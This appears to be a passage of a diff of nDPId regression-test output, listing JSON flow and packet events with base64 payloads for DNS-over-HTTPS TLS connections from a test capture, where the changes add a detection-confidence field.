MhUKtI+3FRz671m\/FiCxQ+DYhEAA2djrJV7bAD8riXyaqFyW2aaJF84flOMuq9DLwOUI0IypM1HnMNVT7vNmCordbJ4vYfoJCHZ3Jdxa1PMxflxUdqb7t2xbf5y\/m1Lgj+QBUEN2VGq3ZK1ktt1GgLlt5OMY6q\/EMncuhg\/OHccuz87CSxEURWL2O5XG3NQ8ZSkyDIF1XtrmR6FGXAhlzN0GIMFD4mIZ5QqyhyGprKsDD36CWqaTOR27WUIRMeWgua2kpjr+elVVRiIT0yfyvShMeR5KvvMj5AG9M4S4\/qWWxJjIv9qLfYm7RWSC4r34hNlFnFlqsqqqzzh\/BxMvV1bwxfAaqA1qBideWKRVA+7EuN95c4ue7X\/hRVHEx3iQLqTqKG9s8vcXeE42KLZOgVl3B7xu8\/i92\/WkhbHAp1VaoXVrJw6GLiISb\/po8DiOQt5NIdGX5eDQSEZ7O9baKasLWzq1YkwfZijF3n9KVs9qv2KSy5IfvS0SD4T0T96JowaLvO1lvBNbG7CindkMAn7au9+n1sxBnSgPOEhxjP6eP7I9klViNjl15nUFM6o4r0CQuVxRwVYjFh10tMhUtqr5ufjJtftBeIT7Z6ffMsMrzPdyzkIvDM+swGXo7V35YzVo8DyoBYe9uM0JJnrorf04OKftnG+pjuV1J118k\/TcF7dgWMascYwrYulqMRqr3vNGGbqZxylwmKp462M5UtGuo+qerBWSrRXWS6eh\/Pd34MrDX1VmvCOR23Z07RB6KZ9U0a03sYPKhsU\/m8X7Y3lJg3mFbu5qAjYzD1O+cD4Myf40iIoCP9xcs4bu1pUmgjVbsp3ut86GCDAgM+2h3m+dYO91dTNrC6JdnpsdKfoGqobbC1Nd6P0Kznfd6xn\/BQDvXNQHfd3IPzPYj2FRyDUuFDyWgT\/cwlGc7O60WUydzXXvs9ttqI8TuCUJYd1Ao8xx8mAgIvrwtyiwJR5QZQxYq0NnVo97JO1hRxuXJb+LTsywktm+cb6647KFCAIE22xi+EiXjOKZOlKgY\/++l2PKcbQh7+iHITgTYo09PyNcnTJxUwLKCZUcpj08uHLE+si9w6kmA+pKFDGKHD2OQi0\/dVl+2FqCH2+A3DCa2Gg9EWzElOrJ9mp3PsOzxGAh1T1616sYT0her6SVuXlhCGP0slwtRkTfN5tnJIo22tEgWtQ+b6y1PTsvRTouR9DpgUBw8BD3g0lRYqf3KAJIjUNpSvsRMGe0P3S4KCcJTz19EnjfZoP6uX+a1+4rjk2AihvF76LGF5wO7bsnmmIDYTvndhSZUKAm3a49yHTGG7gVwYkqmq0TRbx3kmFRXEBuvlULDIz+RlQyLwuJX5uRyHubvUf803FCAz\/4a9pnE6WEDc+zOoXHErWhAfoc5tjJI1gMxGX8U3yJwrwEtij2gQTn0Bbv4+6DXg8iV1mRetvz2V395BS+h9qVm0PJky45RjI5FxKVNW8VUHbBkrW32Ln2Pm3mojmUt+Xsx7zInkOkVoS97LxHGe13JTpikDPPGgpjpEoHIcQRKqtRb0XznaWZx01cfmn3isfcOxCOvXJUXQwHOBr0ZOeVU8JyV5j86F3c2x16THC9pMZadmbjMRbWkSLTw4DMHNpPKhS6WbcQJhxPZwfAVbKEjktlF0JguUnWmRyDWlD919TvF+XWK\/xSop+ME26vjlWYdWryJvX71XiN34ciEg6jsS9BSYdT6j+C8MLHQApTVrKIlUjg7LizXHOZ\/8TbPIjDL1MmbwanCPsnz+x51R4gaxLum0nLoSL+ZmdQWjq\/uyo2YE03WUuDCwEqP451PgmdaqLRPfWLB1DwCAkXZchOxevuMOjyvWV6dC+e+ksCIkxwJmTgcBQXwfuBwje22m5Cj2nv\/zq4aMsV7kiFOS1VcPYLEbw+c4UolvdLrBBCbMxCQZeGhjAzGdsZDuX\/6sRIGIbuHAE8nIh+KJ0joM4KoZNtLXSA2HqbNN+kRQ5gTFmAp4mqAOgsHxAv6V1xCZg8P3MEffeog7NEB4\/K8wtwtgVyjvZaZ4E5jbN5Fjj\/jqK88SEXhkPYnN+on2bA\/r\/BMBIaoCajkogUyGLoyIPMT+pBrWa+wfZKdLurwPxZw+jCxKJC0\/mmFBL81N3ktV2QA+uWulN8QPCd7cD0\/Hjf2QklIJga5shMEJkHY6px3Tk68O3abNmIreZ6S\/N71agsTVbVTSaRlprW4p5D79LYThW+q2zikyKF2eG4VtVQ1Z087sY8sCBmmZG8ETPN5Xq0TN3Q1mXCkwjS9y4DvkEf4d2VKsFN6yj110+kONDzC8lVgKicr46oqIhZ9cyUDwr5+MuFqHiF2KMvJx9XA7v9+a265RIEavlSRTRm3PXbeYNOWUADrJWXjguUacdKmikyCoiD9vRp7ll6YxsV5jSfRT\/9SmZeNE+aTDy2wakB7qY1oeeLE4kVchDyQa22zUAtVHOgOvTZInJYA\/takDFgegJnQaYWISVIejbCOHLLvY\/LGAj1CyqRrh1\/LJm06TJxFQn5cMNb5SSEJFNyxF75PSPT288zWx2Va0aIhDIB+vku9QlaiV4ac8CwDTFNaqbQKECa5ibv22eB002L0jyDWacUoUluFvwofh+CTE377hEPfvjsRjX+V3P\/erPya8F4fW7JQkFJgCrTK1VaoDF64ZvLzNQJ5aCIC3Js6D+sD6g4jOpLHGy2zHMlk9wTN+yBybuSBsrJL9uS5j3JgQRC167kARpn8\/3wkN3\/lvlFPoVYVhj99l\/NeW6y\/YdomeNnyw0D7qas3wz1t0EQFticUf9LLfRMzRHEf20AYOoy9Fonct0XWUb6fLDU7CQJTqCHU8Eiy+rgD2t\/dxE4NlpfZ2ZSbDZ7QWFdftipHKlR4nJqLL0sU6kjZ8SydsZ8oAinHCIV9v5PNYgUBa8WbGYb2kgxJMSN3jbYzsoGwAsbdeAghc0S7LurZvISJXwa0jBqUzUHZmweZXCdDnfDiPc92KCXG9hA13VfXTouQnTd0zyBwPxIcvLGDhAu1CCSmBlGZrOEjmOi1\/i4ug\/A=="}
-00913{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":326,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739378577,"flow_last_seen":946739378607,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":2503,"flow_tot_l4_payload_len":2786,"flow_avg_l4_payload_len":1393,"midstream":1,"ts_msec":946739378607,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.28.34","src_port":33724,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"jp.tiarap.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00939{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":326,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739378577,"flow_last_seen":946739378607,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":2503,"flow_tot_l4_payload_len":2786,"flow_avg_l4_payload_len":1393,"midstream":1,"ts_msec":946739378607,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.28.34","src_port":33724,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"jp.tiarap.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00540{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":327,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":946739378610,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"ts_msec":946739378610,"pkt":"REREREREZmZmZmZmCABFAABoLytAAH4GiGoKAAABaBwcIoO8AbvZKqYtoyMiIFAYAfVFVQAAFAMDAAEBFwMDADUQNuPt6m2nY9MgXiEHZRB5L+gDtuMOMxUUfy82Uox32sOXoFpXHp3NUSfU3Rmr6gABtUijkQ=="}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":342,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380697,"flow_last_seen":946739380697,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"ts_msec":946739380697,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"1.0.0.1","src_port":53802,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00844{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":342,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":946739380697,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"ts_msec":946739380697,"pkt":"REREREREZmZmZmZmCABFAAFIsgNAAH4Gh+8KAAABAQAAAdIqAbvH6z5LSWNp6VAYAfbC9wAAFgMBARsBAAEXAwNccnLckexdP3Wz7tsKiknbwUElui2FZGSKODu9LnFkjSDCKDL2dIORj+O\/DGu\/+ddISHKLc0yxsHWSEQ0iee1a7AAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACoAAAAFwAVAAASZG5zLmNsb3VkZmxhcmUuY29tAAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIM\/CjtFE6\/BfV0qVOcMMUIig11i56\/tpHaQ1FlARye8w"}
-00871{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":342,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380697,"flow_last_seen":946739380697,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"ts_msec":946739380697,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"1.0.0.1","src_port":53802,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.cloudflare.com","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":342,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380697,"flow_last_seen":946739380697,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"ts_msec":946739380697,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"1.0.0.1","src_port":53802,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.cloudflare.com","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 04315{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":946739380725,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":2892,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2892,"pkt_l4_len":2858,"ts_msec":946739380725,"pkt":"ZmZmZmZmRERERERECABFAAs+VjZAADoGHccBAAABCgAAAQG70ipJY2npx+s\/a1AYAELM7QAAFgMDAHoCAAB2AwNqFtv3xWSYHbL\/TEVcxTgtPyY5syhT1Ar0J7GcYm2olyDCKDL2dIORj+O\/DGu\/+ddISHKLc0yxsHWSEQ0iee1a7BMBAAAuADMAJAAdACABwPRBPqMH6tP2UgTdU38yy4IBdMrNy3Y26n6nkJgoEgArAAIDBBQDAwABARcDAwqMAOf8HgLdG4eR2zQrlVcXNJK6gSgekjnntDDuH\/5mItzTS2PjuRorCZtp1e456Yzxd\/c9Pjo0KqOApsf0Oet3HLAxOPX\/4mq0oqPJv6\/pWYh6XkL49x7kn3sA8FLizWIik5oy6pRjSBWFf6tqxUO+Djt17wQK6yhMls9hUq1ClHJUh6Qn273NZpiWOuHCd9wGeCfeInHvS8qk0EqIdne\/5O3+AKgM\/cALapdKbBhIoAyrPwqC2hLjGuasAzda3QO\/+ESHum\/F9d6o\/5K+8IYpY8o8qtVJ6Drg8futbzGhAS87lZYW5UeuuFH05CzhM6cODq7gNj4mbPjTJ5ApTRpwsXEw0cwu6tAiKdHBHu4s131JOS1nhPpDpOs1W8FqhOijP5pChk7nVfwQ9Bu1xYiYmTlZWYP4bC0IhVSltsY4+ffd9etk6QNu1u5Seoh1QaWRe4DU8GYPqDdj9ywHuBnTu\/kdk6yObRcYizbhLyG5JiQSyxA9bv7iPMzOSI\/oPD6Rw4c6cy1qJywZ7F9o\/W7KUU6pYYhqWRcunfBOy2cedxZtVaWxcAQGD7VjEr1GjI\/ndJEL6DV\/vUO5PSsHgdX\/GScVrZdS\/KHwHxAHOv1BpKxNHl+ElIeVfCJc4tBsNkoBf5+COT0BV1cqDq\/0TqIcpVxlMv3\/7JDTZZTI\/wMxcbTZkEC580\/OL4P7o7ZBv1lVciiiGUxirK0Wn0VmKVkOPUH1VVDEVtxbspQjAQAudOqLnKMivdYYnLWKcLFjjfuE8XwFn1JkF2YyGgtdu+0wxe7V3QdQyeX6wSKDfGOBn1RHTiZSQJLrjf\/MjK6PK6+6dmcX2K\/Nos\/HKCWzOCSGOxH6pgvl94s\/0dDawx7iAmW0aKHP7fN\/Qsuj7qBRlYmeX3wDSe3ACAyO8PJtifBKRUnx+i44zF\/TEZT9\/0f9hj1yXYZhM4IttxvCtS3N7k187lM2JB6HB4DmePSpA5UfxEPRq71lNWUsDLAAiN3ekJSKoZ7PUpp\/6SJsuSwyITjf4EqBLpeWL9MrWeNXoUk5W1F7hWZmXxUwbc9PMEuirTVJUIeKJcMT3hUo1x6K9jQ+3H\/3FjLuAvSaGN20\/JlmWzUhH2c19MbTsBdNUca8p5h9ftAYWxNZFi+BPME56GacRIjusosOaDm6TM6NIeJtcd5nQ0Y6NbfwEe7MdB0akdNH1SZ5FpPCUXE+5h9eWmGzxT6gCZx6qvA46+kjmSPa8Cj85dDYPgUItxPMDzQDmcDkFl4Jtoqp7CsVbgDs2FaRSNSCg+ZMEThJQx0\/Aqz+vGM8Axcf5cpBgdqJqmkgft7WVM6LgxM0bWa6ReLOTbftdrjvt51qS7oW8iSFCaAMyVHnB9nNub1rCB71JGnHgmpLaDriPHmvZHyXG+tF3YYxqKFpVLMzSELDqif9S44Mrb9ZjnIWKvGQryM\/QSKoEg5X7zctl4vxNBFap6BlJhqRr3fm7FAc37N2CcUPqfx3Q8d+odOusP4Ls3Xq2Sur1UmBSNW9zqMAV9eCaagN4swiO+HX9D1JhZPxXTW9QWyDXi2zI1HI7LUB70fqeJS7u5T5BooNTQeoNzZVCvWOXWLt+ZiIbxI46okrDHFQXi\/x2G\/UqXdfkOEinNyh78FxOnrKcOtvfU1vQdaz7Z3d1S6XTGxIbp7Avs8yqCBkfYYx0okhQoRYkFViIAKhs8EJ22ENemkpy\/xMNRrY7HXIqAF0plC7ASy6aRPBxNQLpe6Ed5IaeUHDV+pWuEiLAgXAO3BIyMmN+dKwyJRSjGew81SAxYCXzqNGK2p7GdpO\/XP0maghqEG1aIROtTBX2ArldnERnpk4NXjDbfgsSkzP20ClfXeN4yjZTmAjINRHsDFyBG2kVPsbWM6bJ6sXUqNBkjHzH8mUguB01CThNReqO2rGsLiKr5qTMAwxKxjfEdoEJ+OdtfVMDr3B0PaBDiW6NDXICwJTMjrTiHsqLMySrS2T3BXPc1yBL+jDROuKYyhTZQzCA6ktzSKC6wAMC\/2RMbHnV4JUqSuJoXnZI1jiGQfafDh9qm0ZR91\/Upntxs\/kWZ9Zofn9x4gsvGL94XY2stn+kYJ+lpR5T38ZBRBOsXu8bAGsKAP+3wt7PlEML8VYdMSv1Y8XhaZ4vQZT4mxjokM8a+\/vbBm5OFXEOAsw3UpeMp5Pdlywdfks9xANyyHcs7XyT+4nzRjV93W+RbJVksh761\/0CsogB0Bf4AeRq1b8bSy2mVWD\/C9oBFlc4PSw+jhx1uKdorr8amCiJ2bwSUXaBBKYKGtf3eKS0Vrr8DWhAzmAupA8TRMiBwDgWH\/pSpuuBxo4fKT36lTdVMpKIp966xzVRYeAdyJ8dQTy5jeDQL1o\/K9FAvaIxIHdqy3Ai9UpxdTmYwoZXk1RGWSFQPWK2eEqydFLHkwLiG2A9OQ8pCYrZlqHUn1snev7fQAbwrXFOXDJskS+CYp+0GQvu\/Fu37N\/vYvDe9yQ2BjQyb\/Aq\/mNLHkdVzTu+oIIX6og2jNse2SlImfdMuiBssQFePUieOP3nrkgegmZDkJvZU8\/IJtyIPGhvEr4wy0KRjmbk1R5TV1oh+Gvyump800hgoeZ6yINLishVXjkSrZbw30TzgVyIHMXbfVH5cMb\/otpjX8v74ViZ68NiQoVQGCiu9Qccb9jITaHI7YqId83HAhD0Mgcvql8x4riVhsLhWBp7KARZMNylg6FCWQzYhkomLcDqOeaHr\/i3Kucv0p5GzUzkUvhbOyyBarVy1r5EY3Ff\/LeERfwiWeu9JMjSlW9a76FWzNvpbjiVQvAXjpJS+B6vW0S676\/2F\/QVlBvmv\/1e3jfE46NEORC\/KvStAu1+NCVXXkgYYjYaavSuMFqEVMBLpNt3pqmD175kYHYjG6R6TDv0nmjRk\/fdkSOg4ydMi2g43e05SDICPCTBrKL+H8pdmtKEp3WxofXZCtNR+ckTvaTdfJXZMWJbImpAgp0edudixTNqo9z3f5BRBQ1U170EzzThEQIMmS6RHUG4MBWpfatZDm+5s5WqxzAc+f48z+5\/Rjpm1MjT7FAj2QOS2mS1pZuw8jR7f9mlmDHlYUa7yULFKz+EOcDFjny+TGuKCw6tBmvp0uAgOgbWkR3PGwLQlgJNN5qcasz\/DdlRFFRc1kdK872NuK41RPGMSa34kfvjKckPj3jn4ntsF1i9WcRtXZaTKddZmAVoibh8F7o+\/2BqWfWHshjLjbv2UXOWt85MGeIvvR+JAZ4lQKxhMp4ApqHsqTnv9vjAIsk+AJwp0L3kf96BrAf5lxFwLByeiu2ScazZunSG5IvLxJ2cCZzgYOFm\/xSZPCmFYvKNJw727A0qH0cpDBKVk4Z5vvRen3ROFERblATF0imHD72RVGcQ\/rMrcnTAneuS+605QxQwV5cyssndlHujOT5cJjQwi4Me+A9i\/U+gGMItbvzyiV\/bH\/dnSH\/6+REX1pIGyZTP+9n2MXLAZnibrKAMIRfK2TIfrOe5jmJF94vcBm\/\/5ycPeTZII89RYTOm\/OYD7dCL\/Fj+p2ZF9GMMq1KmH\/crTCIqHICoTep9ezhaM3lurJnltFyZNv3oliEoTfl"}
-00913{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":343,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739380697,"flow_last_seen":946739380725,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2838,"flow_tot_l4_payload_len":3126,"flow_avg_l4_payload_len":1563,"midstream":1,"ts_msec":946739380725,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"1.0.0.1","src_port":53802,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns.cloudflare.com","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00939{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":343,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739380697,"flow_last_seen":946739380725,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2838,"flow_tot_l4_payload_len":3126,"flow_avg_l4_payload_len":1563,"midstream":1,"ts_msec":946739380725,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"1.0.0.1","src_port":53802,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns.cloudflare.com","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00542{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":344,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":946739380727,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"ts_msec":946739380727,"pkt":"REREREREZmZmZmZmCABFAABosgVAAH4GiM0KAAABAQAAAdIqAbvH6z9rSWN0\/1AYAfXCFwAAFAMDAAEBFwMDADVke5XeBLKUZMMwsdywo3cwWM6dcwvPxEIBrrKuQwAVECVGBCt8L\/1vmMSczXlzhvKSsbEzJA=="}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":358,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380870,"flow_last_seen":946739380870,"flow_idle_time":7440000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":284,"flow_avg_l4_payload_len":284,"midstream":1,"ts_msec":946739380870,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.90.28.0","src_port":33338,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00836{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":358,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":946739380870,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":338,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":338,"pkt_l4_len":304,"ts_msec":946739380870,"pkt":"REREREREZmZmZmZmCABFAAFEC7lAAH4G5eQKAAABLVocAII6AbvzwYfFjc3Z3lAYAfYLTQAAFgMBARcBAAETAwME0sG+tMqbxpRl1DV8Z2dnX5LfzpIiHTt74xC1bVbZqCBq5Am0FD9Ax\/Z0hd9jpGF+x36pK3fx2LqXRJeDdYghvgAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACkAAAAEwARAAAOZG5zLm5leHRkbnMuaW8ABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAghy6XniNnPGDj9u0r7tzchu6tmfTKqCDkZge3YRdGMjI="}
-00870{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":358,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380870,"flow_last_seen":946739380870,"flow_idle_time":7440000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":284,"flow_avg_l4_payload_len":284,"midstream":1,"ts_msec":946739380870,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.90.28.0","src_port":33338,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.nextdns.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00896{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":358,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380870,"flow_last_seen":946739380870,"flow_idle_time":7440000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":284,"flow_avg_l4_payload_len":284,"midstream":1,"ts_msec":946739380870,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.90.28.0","src_port":33338,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.nextdns.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 02425{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":359,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":946739380903,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"ts_msec":946739380903,"pkt":"ZmZmZmZmRERERERECABFAAXUAxlAADQGM\/UtWhwACgAAAQG7gjqNzdne88GI4VAQAnmV4AAAFgMDAHoCAAB2AwNSUVDmrRSBFJr3VlpPTiOBfna69z7Ip3AgaZ4JY8XZPCBq5Am0FD9Ax\/Z0hd9jpGF+x36pK3fx2LqXRJeDdYghvhMBAAAuACsAAgMEADMAJAAdACBgLhCqxZDxBYT0wty93r8WAtFFYd34UV+f0SYd9yF0RxQDAwABARcDAwAgNdJG6I7V9ce0uN\/W8MyCm58pWjfsCFZXXJnMcWaU4P8XAwMJ4l4xzn1tklFeMfXUSkilkOHkR2CrV0Fk61C4hUjayiVX3XCUzF\/nVmk3NsjsUuGQs+ELPFl7aLMJpdeipyb\/BRKM7DDOdlmSjSZFpz3sI+4Ap1vb842GKpbBCp1KIgOgnmXfMMwnL4uKzNN2+XpL8V9LwuMNROahwk9tJrSx3BZQnvVy5qktKVugzkoTSb9fPpFovSjkUbQUBQuFWl2cxLyQBO6gjWiaDBpgoqREkqW2UGurTHpBXCvX7xTK+SGfs3VLNGPL\/jM509wXezmGXrBZolGpSBcCmwqP5AGjSUkJQ2KFF8\/5I5DLe1rWw\/7rCzdCJgW7dwItPpQigYvEpUhaTQyjzhLtXm4Br1gtr+Iuf0HPHYTCtm1Z9061ijlO7AesYAg3NSX4lpTeBeQNzqwAGQi0kxU+8BsfAI4uhNY4fwD\/tgZRm00kCDUGr0Hw1O0\/9wcQo2OrT4hVI8sBPv9rovACUd1xTXQBUu4c2UNVQr\/DAwgtr3oGHXN\/yf6hHksHqaO6ThyUELGPZgyTaAEJeYSlV\/UuFXosuXrXk+4M4bQmtm8xQA\/hPEgZw03CxD+XIQ9CziCJc2Lx3r4h2FdBiMwzohldpvHSBUXM2GuHl07Muv9yz1FfyzqYAimU2llIffa6XcR6\/N9ex4PCYrVYeRifJmT\/hN608lQ56Pm4ckRgIW72lS0ILwL91eG\/PWLw1TWr9OHqib8dqID1N28WvnDQAc1WG+OfvFA5Lx7KtiZ9\/3KI7f7RCYG\/5anpOjN3Yvo+y